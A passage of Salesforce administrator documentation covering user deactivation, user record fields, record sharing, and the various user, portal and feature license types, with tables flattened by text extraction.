3. Deselect the Active checkbox and click Save.

Tips on Deactivating Users

Consider the following when deactivating users:

• Deactivated users lose access to any records that were manually shared with them, or records that were shared with them
as team members.  However, you can still transfer their data to other users and view their names on the Users page.

• Deactivated users are removed from the default opportunity and account teams of other users. The deactivated users' default
opportunity and account teams are not removed.

• If a user on an account team has Read/Write access (Account Access, Contact Access, Opportunity Access, and Case
Access) and is deactivated, the access will default to Read Only if the user is reactivated.

• Deactivated users continue to own opportunities and appear in forecasts and territories. When users are deactivated, their
opportunity forecast overrides, adjusted total overrides, and manager's choice overrides on subordinates' forecasts are frozen.
However, the manager of a deactivated user can apply manager's choice overrides to that user's forecasts. Rollup amounts
are kept current. If a deactivated user is later reactivated, the user can resume normal work as before. If “Allow Forecasting”
is disabled for a user who is deactivated, the user is removed from any territories her or she is assigned to.

• A deactivated user doesn't count against your organization’s available user licenses. However, deactivating a user doesn't
reduce the number of licenses for which your organization is billed; you must change your organization’s license count to
change your billing.
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• You can't deactivate a user selected as a Customer Portal Administrator.
• You can't deactivate a user selected in a custom hierarchy field even if you delete the field. You must delete and permanently

erase the field first.
• When a delegated external user administrator deactivates a portal user, the administrator doesn't have the option to remove

the portal user from any teams that user is a member of.
• If opportunity splitting is enabled and a user is deactivated, the user is not removed from any opportunity teams on which

the user is assigned a split percentage. To remove the user from the opportunity team, you must first reassign the split
percentage.

• If Chatter is enabled and you deactivate a user, the user is removed from Following and Followers lists. If you reactivate
the user, the subscription information in the Following and Followers lists is restored.

Subscription information can’t be restored if you deactivate multiple users that are following each other. For example, user
A follows user B and user B follows user A. If you deactivate user A and user B, their subscription information to each
other is deleted from Following and Followers lists and can’t be restored if you reactivate the users.

• It's possible for inactive users to be listed as “Created By” users even though they are no longer active in an organization.
This can happen because some system operations create records and toggle preferences, acting as an arbitrary administrator
user in your organization to complete the task. This user may be active or inactive.

• You can’t deactivate a user if they’re assigned as the sole recipient of a workflow email alert.

See Also:
Mass Transferring Records

User Fields

The available fields vary according to which Salesforce Edition you have.

The Personal Information and other personal settings pages include the following fields, listed in alphabetical order. Some of
these fields may not be visible or editable depending on the page, your permissions, or edition.

DescriptionField

When selected, enables a user interface mode designed for
visually-impaired users.

Accessibility Mode

Administrative checkbox that enables or disables user login
to the service.

Active

Street address for user. Up to 255 characters are allowed in
this field.

Address

Opt in to receive administrator-targeted promotional emails
from salesforce.com. This field is not available if your

Admin newsletter

organization has disabled your choice to receive emails from
salesforce.com.
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DescriptionField

Short name to identify user on list pages, reports, and other
pages where the entire name does not fit. Up to eight
characters are allowed in this field.

Alias

Indicates whether the user can use customizable forecasting.Allow Forecasting

Indicates whether an API token has ever been reset.
Salesforce.com uses this field to help you troubleshoot issues
related to API tokens if issues should occur.

Api Token

The name of the call center to which this user is assigned.Call Center

Indicates whether the user is notified by email when his or
her Checkout account is activated and available for login.

You must have “Manage Billing” permission to enable.

Checkout Enabled

City portion of user’s address. Up to 40 characters are allowed
in this field.

City

Indicates whether the option to set an alternate color palette
for charts has been enabled. The alternate palette has been

Color-Blind Palette on Charts

optimized for use by color-blind users. For dashboard emails,
the alternate palette is not used.

A nickname is the name used to identify this user in a
community. Up to 40 alphanumeric characters are allowed.
Standard users can edit this field.

Nickname

Company name where user works. Up to 40 characters are
allowed in this field.

Company

Name of the associated contact if the user is a partner user.Contact

Country portion of user’s address. Up to 80 characters are
allowed in this field.

Country

The country for the address. Entry is selected from a picklist
of standard values.

Country (beta)

User who created the user including creation date and time.
(Read only)

Created By

User’s default currency for quotas, forecasts, and reports.
Shown only in organizations using multiple currencies. This
must be one of the active currencies for the organization.

Currency

Listing of custom links for users as set up by your
administrator.

Custom Links

Enables a user to find contact and lead records from Data.com
and add them to Salesforce. Also indicates the type of

Data.com User Type

Data.com user. Data.com Users get a limited number of
records to add or export per month, and their unused additions
expire at the end of each month. For each Data.com User,
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DescriptionField

you can see the monthly limit and number of records added
to Salesforce or exported during the month. Data.com List
users share account, contact, and lead record additions from
a pool. You can see the organization’s limit, and the number
of records each Data.com List User has added to Salesforce
or exported.

User's default currency setting for new records. Available only
for organizations that use multiple currencies.

Default Currency ISO Code

Division that is applied, by default, to all new accounts and
leads created by the user, unless he or she explicitly sets a

Default Division

different division. When users create records related to an
account or other record that already has a division, the new
record is assigned to the existing record’s division; the default
division is not used.

This setting does not restrict the user from viewing or creating
records in other divisions. Users can override change their
default division at any time by setting a working division.

Available only in organizations that use divisions to segment
their data.

User lookup field used to select a delegate approver for
approval requests. Depending on the approval process settings,
this user can also approve approval requests for the user.

Delegated Approver

Group that user works for, for example, Customer Support.
Up to 80 characters are allowed in this field.

Department

Enables development mode for creating and editing
Visualforce pages.

This field is only visible to organizations that have Visualforce
enabled..

Development Mode

Disables automatic feed subscriptions to records owned by a
user. Only available in organizations with Chatter enabled.

Disable Auto Subscription For Feeds

Company division to which user belongs for example, PC
Sales Group. Up to 40 characters are allowed in this field.

Division

Email address of user. Must be a valid email address in the
form: jsmith@acme.com. Up to 80 characters are allowed in
this field.

Email

Character set and encoding for outbound email sent by user
from within Salesforce. ISO-8859-1 represents all Latin

Email Encoding

characters and should be used by English-speaking users.
UTF-8 (Unicode) represents all characters for all of the world’s
languages, but is not supported by some older email software.
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DescriptionField

Shift_JIS, EUC-JP and ISO-2022-JP are useful for
Japanese users.

Identifying number for a user.Employee Number

Time of day that user generally stops working. Used to define
the times that display in the user’s calendar.

End of day

Fax number for user.Fax

The value used to identify a user for federated authentication
single sign-on.

Federation ID

First name of user, as displayed on the user edit page. Up to
40 characters are allowed in this field.

First Name

Grants the ability to run flows. Available in Developer (with
limitations), Enterprise, and Unlimited Editions.

You must have the “Manage Force.com Flow” permission to
enable.

Force.com Flow User

If the user has the “Run Flows” permission, you don’t need to
enable this field.

Enables the Force.com quick access menu, which appears in
object list view pages and record detail pages, and provides
shortcuts to customization features for apps and objects.

Force.com Quick Access Menu

The default currency for all currency amount fields in the user
record. Available only for organizations that use multiple
currencies.

Information Currency

Grants access to Salesforce Knowledge. The user's profile
determines whether he or she has access to the Article

Knowledge User

Management tab or Articles tab. Available in Professional,
Enterprise, and Unlimited Editions.

The primary language for the user. All text and online help is
displayed in this language. In Professional, Enterprise, and

Language

Unlimited Edition organizations, a user’s individual Language
setting overrides the organization’s Default Language.

Not available in Personal Edition, Contact Manager, or Group
Edition™. The organization’s Display Language applies
to all users.

Date of last login. (Read only)Last Login

Last name of user, as displayed on the user edit page. Up to
80 characters are allowed inthis field.

Last Name
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DescriptionField

Country or geographic region in which user is located.

The Locale setting affects the format of date, date/time, and
number fields, and the calendar. For example, dates in the

Locale

English (United States) locale display as 06/30/2000 and as
30/06/2000 in the English (United Kingdom) locale. Times
in the English (United States) locale display using a
twelve-hour clock with AM and PM (for example, 2:00 PM),
whereas in the English (United Kingdom) locale, they display
using a twenty-four-hour clock (for example, 14:00).

The Locale setting also affects the first and last name order
on Name fields for users, leads, and contacts. For example,
Bob Johnson in the English (United States) locale displays as
Bob Johnson, whereas the Chinese (China) locale displays the
name as Johnson Bob.

For Personal Edition users, the locale is set at the organization
level (from Setup, click Company Profile > Company
Information). For all other users, their personal locale,
available at their personal information page, overrides the
organization setting.

When this option is enabled, users land in the Setup page
when they log in.

Make Setup My Default Landing Page

Lookup field used to select the user's manager. This field:Manager

• Establishes a hierarchical relationship, preventing you from
selecting a user that directly or indirectly reports to itself.

• Allows Chatter to recommend people and records to follow
based on your organization's reporting structure.

This field is especially useful for creating hierarchical workflow
rules and approval processes without having to create additional
hierarchy fields.

Note:  Unlike other hierarchy fields, Salesforce allows
you to inactivate users who are referenced in the
Manager field.

When enabled, the user can create, edit, and delete campaigns,
configure advanced campaign setup, import leads, and update

Marketing User

campaign history via the member import wizards. Available
in Professional, Enterprise, and Unlimited Editions.

To use the campaign import wizards, Marketing Users must
also have the Marketing User profile (or the “Import Leads”
permission and the “Edit” permission on campaigns in
Enterprise and Unlimited Edition organizations).
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DescriptionField

If this option isn’t selected, the user can only view campaigns
and advanced campaign setup, edit the Campaign History for
a single lead or contact, and run campaign reports.

Cellular or mobile phone number. Up to 40 characters are
allowed in this field. This number is used for SMS-based
identity confirmation.

Administrators enable this feature from Setup by checking
Enable SMS-based identity confirmation at
Security Controls > Session Settings.

Mobile

Once enabled, every user sees a screen after logging in that
asks them to register for mobile verification. The user can take
one of the following actions:

• Enter a mobile phone number and then have it verified
with a text message.

• Skip entering a mobile number now, but get asked again
at their next login.

• Completely opt out of mobile verification.

Once a user’s mobile phone number is verified, Salesforce will
use it to verify the user when necessary, such as when a user
tries to log in from an unknown IP address.

Administrators can also enter users’ mobile numbers and
pre-verify them. If Enable SMS-based identity
confirmation is set when an Administrator enters a mobile
number for a user, or when a mobile number is set from an
API using the User object, the mobile number is automatically
considered verified. If Enable SMS-based identity
confirmation is not set, the new mobile phone number is
not considered verified. “Verified” means that Salesforce will
not ask the user to verify a mobile phone number at login, and
that Salesforce will use the number to send the user a
verification code when necessary for SMS-based identity
confirmation.

Allocates one Salesforce Classic license to the user, granting
the user access to Salesforce Classic app. The number of user

Mobile User

records enabled by this checkbox can’t exceed the total number
of mobile licenses your organization has. Available in
Professional, Enterprise, and Unlimited Editions.

The Mobile User checkbox is enabled by default for Unlimited
and Developer Edition users. To prevent users from activating
the Salesforce Classic app on their mobile devices before you’re
ready to deploy it in your organization, disable the checkbox
for all your users.
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DescriptionField

If the user has already activated his or her Salesforce Classic
account, deselecting the Mobile User checkbox revokes the
user's mobile license. The next time the user's device
synchronizes with Salesforce, all the Salesforce data is deleted
from the device, and the device is no longer associated with
the user.

Note: The Mobile User checkbox doesn't apply
to the free version of Salesforce Classic because users
of the free app can access Salesforce from their device
without a mobile license.

The mobile configuration assigned to the user. If no mobile
configuration is specified, this field defaults to the mobile
configuration assigned to the user's profile.

This field is only visible to organizations that use Salesforce
to manage mobile configurations.

Mobile Configuration

User who last changed the user fields, including modification
date and time. (Read only)

Modified By

If the user's Data.com User Type is Data.com User, the
number of Data.com contact and lead records the user can
add each month.

The default number of records per license is 300, but you can
assign more than that or fewer, up to the organization limit.

Monthly Contact and Lead Limit

Combined first and last name of user, as displayed on the user
detail page.

Name

Opt in to receive user-targeted promotional emails from
salesforce.com. This field is not available if your organization
has disabled your choice to receive emails from salesforce.com.

Newsletter

Administrative checkbox that grants the user access to Connect
Offline. Available in Professional, Enterprise, and Unlimited
Editions.

Offline User

Denotes whether a partner portal user is a super user.Partner Super User

Phone number of user. Up to 40 characters are allowed in this
field.

Phone

Administrative field that specifies the user’s base-level
permissions to perform different functions within the

Profile

application. Additional permissions may be granted to the
user through permission sets.

Set preferences for receiving approval request emails.Receive Approval Request Emails
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DescriptionField

If selected, specifies that a non-portal user with a Salesforce
CRM Content User license and Salesforce CRM Content

Receive Salesforce CRM Content Daily Digest

subscriptions will receive a once-daily email summary if activity
occurs on his or her subscribed content, libraries, tags, or
authors. To receive email, the Receive Salesforce CRM
Content Email Alerts checkbox must also be selected.
Portal users do not need the Salesforce CRM Content
User license; they only need the View Content in
Portals user permission.

If selected, specifies that a non-portal user with a Salesforce
CRM Content User license and Salesforce CRM Content

Receive Salesforce CRM Content Email Alerts

subscriptions will receive email notifications if activity occurs
on his or her subscribed content, libraries, tags, or authors.
To receive real-time email alerts, select this checkbox and do
not select the Receive Salesforce CRM Content
Daily Digest checkbox. Portal users do not need the
Salesforce CRM Content User license; they only need
the View Content in Portals user permission.

Administrative field that specifies position of user within an
organization, for example, Western Region Support Manager.

Role

Roles are selected from a picklist of available roles, which can
be changed by an administrator.

Not available in Personal Edition, Contact Manager, or Group
Edition.

Administrative checkbox that indicates whether a user has
access to use Salesforce CRM Content. Available in
Professional, Enterprise, and Unlimited Editions.

Salesforce CRM Content User

When enabled, specifies that the user was created via
self-registration to a Customer Portal. Available in Enterprise
and Unlimited Editions.

Self-Registered via Customer Portal

If selected, specifies that the user will receive email notification
whenever he or she executes Apex that surpasses more than
50% of allocated governor limits.

Available in Developer, Enterprise, and Unlimited Editions
only.

Send Apex Warning Emails

Enables the View State tab in the development mode footer
forVisualforce pages.

This field is only visible to organizations that have Visualforce
enabled, and Development Mode selected.

Show View State in Development Mode

Allocates one Site.com Contributor license to the user,
granting the user limited access to Site.com Studio. Users with

Site.com Contributor User
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DescriptionField

a Contributor license can use Site.com Studio to edit site
content only.

The number of user records with this checkbox enabled can't
exceed the total number of Site.com Contributor licenses your
organization has.

Available in Developer, Enterprise, and Unlimited Editions,
only if Site.com is enabled for your organization.

Allocates one Site.com Publisher license to the user, granting
the user full access to Site.com Studio. Users with a Publisher

Site.com Publisher User

license can build and style websites, control the layout and
functionality of pages and page elements, and add and edit
content.

The number of user records with this checkbox enabled can't
exceed the total number of Site.com Publisher licenses your
organization has.

Available in Developer, Enterprise, and Unlimited Editions,
only if Site.com is enabled for your organization.

Time of day that user generally starts working. Used to define
the times that display in the user’s calendar.

Start of day

State or province portion of user’s address. Up to 80 characters
are allowed in this field.

State/Province

The state or province for the address. Entry is selected from
a picklist of standard values.

State/Province (beta)

Primary time zone in which user works.

Users in Arizona should select the setting with
“America/Phoenix,” and users in parts of Indiana that do not

Time Zone

follow Daylight Savings Time should select the setting with
“America/Indianapolis.”

Job title of user. Up to 80 characters are allowed in this field.Title

Turns on automatic redirection to Salesforce Touch when a
user logs in to Salesforce from a supported web browser on a
mobile touchscreen device.

Touch User

Amount of disk storage space the user is using.Used Space

Indicates the type of user license.User License

Administrative field that defines the user’s login. Up to 80
characters are allowed in this field.

Username
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DescriptionField

Zip code or postal code portion of user’s address. Up to 20
characters are allowed in this field.

Zip/Postal Code

See Also:
Viewing and Managing Users
User License Types
Viewing Feature Licenses

Sharing Users
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on user recordsTo view user records:

In Salesforce, you can share external user records, such as external community users and customer portal or partner portal
users. You can also share an internal user record with an external user. Sharing a user record is similar to sharing other record
types such that other users can access them. This can be done manually on each user record if the organization-wide default
or user sharing rules don’t already provide access.

Your administrator defines your organization’s sharing model and default access levels for user records. You may want to
extend sharing privileges for your own user record if the organization-wide default access is set to Private or Public Read Only.
Note that you cannot restrict access below your organization’s default access levels.

To view and manage sharing details, click Sharing on the user detail page. The Sharing Detail page lists the users, groups,
roles, and territories that have sharing access to the user record. On this page, you can perform these tasks:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Grant access to the record for other users, groups, roles, or territories by clicking Add.

• Edit or delete the manual sharing rule by clicking Edit or Del next to the rule.
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Granting Access to User Records
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on the user with whom you’re sharingTo grant access to your own user record:

“Manage Users”To grant access to any other user record:

Users can manually grant access to user records so other users can see them. Users inherit the same access as users below them
in the role hierarchy.

Granting access to a user record makes the user’s detail page visible to others, and makes the user visible in lookups, list views,
search, and so on.

You can share your user record manually if others cannot access it otherwise through the organization-wide defaults, sharing
rules, or role hierarchy. The higher level of access is maintained if you gain access through more than one method. High-volume
portal users can be included in manual shares to be shared with other users, but not in sharing rules.

To grant access to a user record:

1. Click Sharing on the user record you want to share.

The Sharing Detail page lists the users, groups, roles, and territories that have access to the user record.

2. Click Add.
3. From the drop-down list, select the group, user, role, or territory to share with.
4. Choose which users will have access by adding them to the Share With list.
5. Select the access level for the record you are sharing.

Possible values are Read/Write or Read Only, depending on your organization-wide defaults for users. You can only grant
a higher access than your organization-wide default.

6. Click Save.

To edit or delete the record access, click Sharing on the record, and click Edit or Del next to the manual share. You might
not see the Edit option if your organization-wide defaults is set to Public Read Only and the only valid access level on the
manual share is Read/Write.
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User License Types
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view user license types:

You may have more than one type of user license in your organization. A user license entitles a user to different functionality
within Salesforce and determines which profiles and permission sets are available to the user.

To view a list of the active user licenses in your company, from Setup, click Company Profile > Company Information. This
page lists the following for each type of user license:

• Status indicates the status of the license.

• Total Licenses indicates the number of licenses for which your company is billed and that are available to you.

• Used Licenses is the number of licenses that you have assigned to users.

• Remaining Licenses is the number of unused licenses.

If Checkout is enabled for your organization, you can click Buy More Licenses to go to Checkout to buy additional user
licenses.

In addition to license types, the following portal login information is listed for organizations that have Customer Portals or
partner portals enabled:

• Monthly Logins Allotted shows the maximum number of customer or partner portal logins allowed per month.

• Monthly Logins Used indicates the number of successful logins for all users associated with a customer or partner
portal user license for the month.

Note: You may see other types of licenses listed on this page if your organization has purchased custom user licenses
for different types of functionality.  Your organization may also have other licenses that are still supported, but are
no longer available. Contact salesforce.com for more information.

These lists describe the functionality a user is entitled to for each type of standard user license.

Salesforce License Types

Designed for users who require full access to standard CRM and Force.com AppExchange apps. Users
with this user license are entitled to access any standard or custom app.

Each license provides additional storage for Enterprise and Unlimited Edition users.

Salesforce

Salesforce
Platform Note:  This license is not available for new customers.

Designed for users who need access to custom apps but not to standard CRM functionality. Users with
this user license are entitled to use custom apps developed in your organization or installed from Force.com
AppExchange. In addition, they are entitled to use core platform functionality such as accounts, contacts,
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reports, dashboards, documents, and custom tabs. However, these users are not entitled to some user
permissions and standard apps, including standard tabs and objects such as forecasts and opportunities.
Users with this license can also use Connect Offline.

Note: Users with this license can only view dashboards if the running user also has the same
license.

Users with a Salesforce Platform user license can access all the custom apps in your organization.

Each license provides additional storage for Enterprise and Unlimited Edition users.

Force.com -
One App Note:  This license is not available for new customers.

Designed for users who need access to one custom app but not to standard CRM functionality. Force.com
- One App users are entitled to the same rights as Salesforce Platform users, plus they have access to an
unlimited number of custom tabs. However, they are limited to the use of one custom app, which is defined
as up to 10 custom objects, and they are limited to read-only access to the Accounts and Contacts objects.

Note: Users with this license can only view dashboards if the running user also has the same
license.

Each license provides an additional 1 MB of data storage and 1 MB of file storage, regardless of the
Salesforce Edition.

Grants users access to a Force.com Light App or Force.com Enterprise App, neither of which include
CRM functionality.

A Force.com Light App has up to 10 custom objects and 10 custom tabs, has read-only access to accounts
and contacts, and supports object-level and field-level security. A Force.com Light App can’t use the Bulk
API or Streaming API.

Force.com
App
Subscription

A Force.com Enterprise App has up to 10 custom objects and 10 custom tabs. In addition to the permissions
of a Force.com Light App, a Force.com Enterprise App supports record-level sharing, can use the Bulk
API and Streaming API, and has read/write access to accounts and contacts.

Note: Users with this license can only view dashboards if the running user also has the same
license.

Each Force.com App Subscription license provides an additional 20 MB of data storage and 612 MB of
file storage, regardless of the Salesforce edition.

Designed for users who only need access to the Salesforce Knowledge app. This license provides access to
the following tabs: Articles, Article Management, Chatter, Chatter Files, Home, Profiles, Reports, custom

Knowledge
Only User

objects, and custom tabs. The Knowledge Only User license includes a Knowledge Only profile that grants
access to the Articles tab. To view and use the Article Management tab, a user must have the “Manage
Articles” permission.

295

User License TypesManage Users



Designed for Unlimited, Enterprise, and Professional Edition users that don't have Salesforce licenses but
need access to Chatter. These users can access standard Chatter people, profiles, groups, and files. They
can't access any Salesforce objects or data.

Chatter Free

Note:  You can upgrade a Chatter Free license to a standard Salesforce license at any time, however,
you can't convert a standard Salesforce or Chatter Only license to a Chatter Free license.

Designed to allow customers in Chatter groups. Customers are users outside of a company’s email domain.Chatter
External

Also known as Chatter Plus. Designed for Unlimited, Enterprise, and Professional Edition users that don’t
have Salesforce licenses but need access to some Salesforce objects in addition to Chatter. These users can
access standard Chatter people, profiles, groups, and files, plus they can:

Chatter Only

• View Salesforce accounts and contacts
• Use Salesforce CRM Content, Ideas, and Answers
• Modify up to ten custom objects

Note:  You must expose the tabs for the standard Salesforce objects that the Chatter Only user
profile can access, as they are hidden by default for these users.

Professional Edition organizations must have Profiles enabled to perform these tasks. Contact
your sales representative for more information.

For more information on Chatter Plus users, see Chatter Plus Frequently Asked Questions.

Sites and Site.com License Types

Designed for public users who access your Site.com or Force.com sites. If Communities is enabled, these
users also have access to public pages in your communities. Site visitors have access to any information

Guest User

made available in an active public site. For each Guest User license, you can develop one site for your
organization.

For Site.com, Developer, Enterprise, and Unlimited Editions each come with unlimited Guest User
licenses.

For Force.com sites, Enterprise and Unlimited Editions each come with 25 Guest User licenses. Developer
Edition comes with one Guest User license.

Note:

• You can't purchase additional Guest User licenses for Force.com sites.
• The Authenticated Website high-volume portal user license is specifically designed to be used

with Force.com sites. Because it's designed for high volumes, it should be a cost-effective
option to use with Force.com sites.

Designed for Unlimited and Enterprise Edition users who need access to Site.com but not to standard
CRM functionality. Site.com Only users are entitled to the same rights as Force.com - One App users,

Site.com
Only

plus they have access to the Content app. However, they don't have access to the Accounts and Contacts
objects. Users have access to an unlimited number of custom tabs, but are limited to the use of one custom
app, which is defined as up to 20 custom objects.
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Each Site.com Only user also needs either a Site.com Contributor or Site.com Publisher feature license
to access Site.com.

Communities License Types
There are two Communities licenses for external users: Customer Community and Partner Community.

The Customer Community license is similar to a High Volume Customer Portal license and is well-suited for
business-to-consumer communities with large numbers of external users. The Partner Community license is similar to a Gold
Partner license and is well-suited for business-to-business communities, such as a partner community.

In addition to the new licenses, Communities supports all internal and portal licenses including existing Customer Portal,
Authenticated Website, and partner portal licenses. Communities doesn’t support the Chatter External license.

To avoid deployment problems and any degradation in service quality, we recommend that the number of users in your
community not exceed the limits listed below. If you require additional users beyond these limits, contact your Salesforce.com
account executive. Exceeding the below limits may result in additional charges and a decrease in functionality.

Number of UsersType of Community

200,000Partner

5 millionCustomer

This table shows which features are available to users with Customer Community or Partner Community licenses.

Partner CommunityCustomer Community

Read Only

Accounts

Read Only

Contacts

Assets

Can create and manage their own cases.

Cases

Leads

Opportunities

Chatter (People, Groups, Feeds, Files)

Chatter Answers

Ideas

Read OnlyRead Only

Knowledge

Mobile
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Partner CommunityCustomer Community

View Only

Content (without a Salesforce CRM
Content feature license)

Read Only

Reports & Dashboards

Can view tasks, but can’t create them.

Activities

Read Only

Campaigns

Email

Delegated Administration

Roles and Sharing

10 custom objects per license10 custom objects per license

Custom Objects

Service Cloud Portal User Licenses
Service Cloud Portal users have the High Volume Customer Portal license. This license gives contacts unlimited logins to
your Service Cloud Portal to access customer support information. Users with this license can access accounts, assets, cases,
contacts, custom objects, documents, ideas, and questions, depending on their permission settings.

The Overage High Volume Customer Portal license is the same as the High Volume Customer Portal license, except that
users do not have unlimited logins. Contact salesforce.com for information about the number of Customer Portal licenses you
can activate.

This table lists the permissions that can be assigned to Service Cloud portal users.

DeleteUpdateReadCreate

Accounts

Assets

Cases

Contacts

Custom Objects

Documents

Ideas

Knowledge

Price Books
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DeleteUpdateReadCreate

Products

Questions and Answers

Solutions

Customer Portal User Licenses
Users of a Customer Portal site have the Customer Portal Manager Standard license.  It allows contacts to log into your
Customer Portal to manage customer support. You can associate users who have a Customer Portal Manager Standard license
with the Customer Portal User profile or a profile cloned and customized from the Customer Portal User profile. This lets
them view and edit data they directly own or data owned by or shared with users below them in the Customer Portal role
hierarchy. These users can also view and edit cases where they are listed in the Contact Name field.

Users with the Customer Portal Manager Standard license can:

• View contacts, price books and products.
• View and edit accounts and cases.
• Create and edit assets.
• Create, view, edit and delete custom objects.
• Access custom objects depending on their permissions.
• Receive the “Portal Super User” permission.
• Access Salesforce CRM Content if they have a Salesforce CRM Content feature license or the appropriate permissions.

The Overage Customer Portal Manager Standard license is the same as the Customer Portal Manager Standard license, except
that users are limited to one login per month.

Note:  This license is not available for new customers.

This table lists the permissions that can be given to Customer Portal users.

DeleteUpdateReadCreate

Accounts

Assets

Cases

Contacts

Custom Objects

Documents

Ideas

Knowledge

Price Books

Products
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DeleteUpdateReadCreate

Solutions

Questions and Answers

Customer Portal — Enterprise Administration User Licenses
Customer Portal — Enterprise Administration users have the Customer Portal Manager Custom license. This license gives
contacts unlimited logins to your Salesforce Customer Portal to manage customer support. You can associate users who have
a Customer Portal Manager Custom license with the Customer Portal User profile or a profile cloned and customized from
the Customer Portal User profile, which lets them view and edit data they directly own and view, create, and edit cases where
they're listed in the Contact Name field.

Users with this license can:

• Create, read or update accounts, assets and cases.
• View contacts.
• View custom objects and run reports depending on their permissions.
• Receive the “Portal Super User” and “Delegated External User Administrator” permissions.
• Access Salesforce CRM Content if they have a Salesforce CRM Content feature license or the appropriate permissions.

The Overage Customer Portal Manager Custom license is the same as the Customer Portal Manager Custom license, except
that users do not have unlimited logins. Contact salesforce.com for information about the number of Customer Portal licenses
you can activate.

This table lists the permissions that can be given to Customer Portal — Enterprise Administration users.

DeleteUpdateReadCreate

Accounts

Assets

Cases

Contacts

Custom Objects

Documents

Ideas

Knowledge

Price Books

Products

Solutions

Questions and Answers
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Platform Portal User Licenses
Platform portal users have the Authenticated Website license, which is designed to be used with Force.com Sites. It gives
named sites users unlimited logins to your Platform Portal to access customer support information.

Users with this license have read and create access on ideas and questions and answers, and read-only access to documents,
knowledge, price books, and products.

The Overage Authenticated Website license is the same as the Authenticated Website license, except that users do not have
unlimited logins.

This table lists the permissions that can be given to Platform portal users.

DeleteUpdateReadCreate

Documents

Ideas

Knowledge

Price Books

Products

Questions and Answers

Partner Portal User Licenses
Partner Portal users have the Gold Partner user license. They can only access Salesforce using the partner portal.

This table lists the permissions that can be given to Partner Portal users.

DeleteUpdateReadCreate

Accounts

Approvals

Assets

Campaigns

Cases

Contacts

Custom Objects

Documents

Ideas

Knowledge

Leads

Opportunities

Price Books
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DeleteUpdateReadCreate

Products

Solutions

Questions and Answers

Database.com User Licenses

Default Number of
Available Licenses

DescriptionUser License

Database.com
Edition: 3

Designed for users who need to administer Database.com,
or make changes to Database.com schemas or other metadata
using the point-and-click tools in the Database.com Console.

Database.com Admin

Database.com
Edition: 3

Enterprise Edition
and Unlimited
Edition: 0

Designed for users who need API access to data stored in
Database.com.

Database.com User

Contact
salesforce.com to
obtain
Database.com User
Licenses

Database.com
Edition: 0

Enterprise Edition
and Unlimited
Edition: 0

Designed for users who need only API access to data, need
to belong to Chatter groups (but no other groups), and don't
need to belong to roles or queues. Access to data is determined
by organization-wide sharing defaults.

Database.com Light User

Contact
salesforce.com to
obtain
Database.com Light
User Licenses

Data.com User Licenses

Designed to allow users to add or export a limited number of
Data.com records per month. The default number of records

Data.com User

per license is 300, but it can be adjusted based on your
agreement. Additions expire at the end of each month, as
determined by your organization's default time zone.

Designed to allow users to share record additions from a pool.
All Data.com List users work from the organization’s Pool

Data.com List User
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Record Limit, so if one Data.com List user reaches the limit,
other users of that type will not be able to add records.

See Also:
Viewing and Managing Users
Company Information Overview

Feature Licenses Overview
A feature license entitles a user to an additional Salesforce feature, such as Marketing or Connect Offline.

Available in: Enterprise, Unlimited, and Developer editions

User Permissions Needed

“View Setup and Configuration”To view feature licenses:

• View the feature licenses enabled for your organization

• Allow users to use a feature

• See all feature licenses currently available in Salesforce

Note:  Depending on the features that are enabled for your organization, you might be able to assign more than one
type of feature license to your users.

See Also:
Viewing and Managing Users
Purchasing Additional User Licenses
Company Information Overview
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Viewing Feature Licenses

Available in: Enterprise, Unlimited, and Developer editions

User Permissions Needed

“View Setup and Configuration”To view feature licenses:

For information on purchasing feature licenses, contact salesforce.com.

1. From Setup, click Company Profile > Company Information.
2. At the bottom of the Company Information page, view the Feature Licenses related list.

The Feature Licenses related list shows information for each type of feature license.

• Status indicates the status of the license.
• Total Licenses indicates the number of licenses for which your company is billed and that are available to you.
• Used Licenses is the number of licenses that you have assigned to users.
• Remaining Licenses is the number of unused licenses.

See Also:
Feature Licenses Overview
Available Feature Licenses
Enabling Feature Licenses for Users
Viewing and Managing Users
Purchasing Additional User Licenses

Enabling Feature Licenses for Users

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To enable feature licenses:

For information on purchasing feature licenses, contact salesforce.com.

You can enable a feature for a user in your organization when editing a user.

1. In Setup, click Manage Users > Users.
2. In the user list view, click a user’s name.
3. On the User Detail page, select the checkbox next to the feature license you want to enable for that user.

You can enable more than one feature license for a single user.
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4. Click Save.

Note:  You can also enable a feature when creating new users.

See Also:
Feature Licenses Overview
Available Feature Licenses
Viewing Feature Licenses
Viewing and Managing Users

Available Feature Licenses
More than one type of feature license may be available to assign to your users.

Available in: Enterprise, Unlimited, and Developer editions

Available feature licenses are:

Enables a user toFeature License

Access Chatter Answers. This feature license is automatically
assigned to high-volume portal users who self-register for
Chatter Answers.

Chatter Answers User

Find contact and lead records from Data.com and add them
to Salesforce. Also indicates the type

Data.com User

of Data.com. Data.com Users get a limited number of records
to add or export per month, and their unused additions expire
at the end of each month. For each Data.com User, you can
see the monthly limit and number of records added
to Salesforce or exported during the month. Data.com List
users share account, contact, and lead record additions from
a pool. You can see the organization’s limit, and the number
of records each Data.com List User has added to Salesforce or
exported.

Run flows.Force.com Flow User

Access Salesforce Knowledge.Knowledge User

Access to Live AgentLive Agent User

Create, edit, and delete campaigns, configure advanced
campaign setup, import leads, and update campaign history
via the member import wizards.

Marketing User

Access Salesforce Classic. The Mobile User checkbox
doesn't apply to the free version of Salesforce Classic because

Mobile User
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Enables a user toFeature License

users of the free app can access Salesforce from their device
without a mobile license.

Access Connect Offline.Offline User

Access Salesforce CRM Content.Salesforce CRM Content User

Access the Service Cloud Console.Service Cloud User

Edit site content on Site.com Studio.Site.com Contributor User

Create and style websites, control the layout and functionality
of pages and page elements, and add and edit content on
Site.com Studio.

Site.com Publisher User

See Also:
Viewing Feature Licenses
Enabling Feature Licenses for Users
Viewing and Managing Users
Feature Licenses Overview

Usage-based Entitlements Overview (BETA)
A usage-based entitlement is a resource that your organization can use on a per-month basis, such as the allowed number of
logins to a Partner Community.

Available in: Enterprise and Unlimited editions

Some entitlements are persistent. These entitlements give your organization a set number of the resource, and the amount
allowed doesn’t change unless your contract is changed. For example, if your company purchases monthly subscriptions for
50 members to access a Partner Community, you can assign up to 50 individuals the ability to log into the community as many
times as they want.

